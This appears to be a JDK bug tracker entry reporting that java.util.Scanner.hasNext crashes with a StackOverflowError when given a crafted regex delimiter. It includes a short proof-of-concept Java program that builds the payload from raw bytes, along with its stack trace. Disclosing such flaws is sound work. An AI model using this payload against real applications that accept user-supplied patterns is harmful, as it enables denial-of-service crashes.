Uploaded image for project: 'JDK'
  1. JDK
  2. JDK-8282393

Scanner.hasNext lacks recursion detection

    XMLWordPrintable

Details

    • Bug
    • Resolution: Unresolved
    • P4
    • tbd
    • 18
    • core-libs
    • None

    Description

      j.u.Scanner allows to set a regular expression string as text delimiter. A
      missing recursion upper limit in regex processing causes a stack overflow to
      occur when querying for the availability of a potential next token to be
      delivered by the scanner.

      Developers could use this API to allow users to query larger texts for
      patterns, for example in a web application. However edge cases exist that
      cause a StackOverflowError to be triggered, instead of detecting the recursion scenario earlier.

      The following PoC illustrates the issue:

      import java.util.*;
      public class ScannerSOE {
          public static void main(String[] a) {
              String payload = new String(new
      byte[]{91,92,97,92,87,45,45,45,45,45,45,45,45,45,45,120,121,122,123,49,44,51,38,38,38,99,-118,-118,69,93,-126,-36});
              Scanner s = new Scanner("1 fish 2 fish red fish blue fish");
              s.useDelimiter(payload.substring(0,26)+(new String(new
      byte[]{-118})).repeat(16384)+payload.substring(27));
              s.hasNext();
          }
      }

      to reproduce:

      $ java ScannerSOE 2>&1 | head -4
      Exception in thread "main" java.lang.StackOverflowError
      at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)
      at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)
      at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)

      Attachments

        Activity

          People

            igraves Ian Graves
            mschoene Marc Schönefeld
            Votes:
            0 Vote for this issue
            Watchers:
            2 Start watching this issue

            Dates

              Created:
              Updated: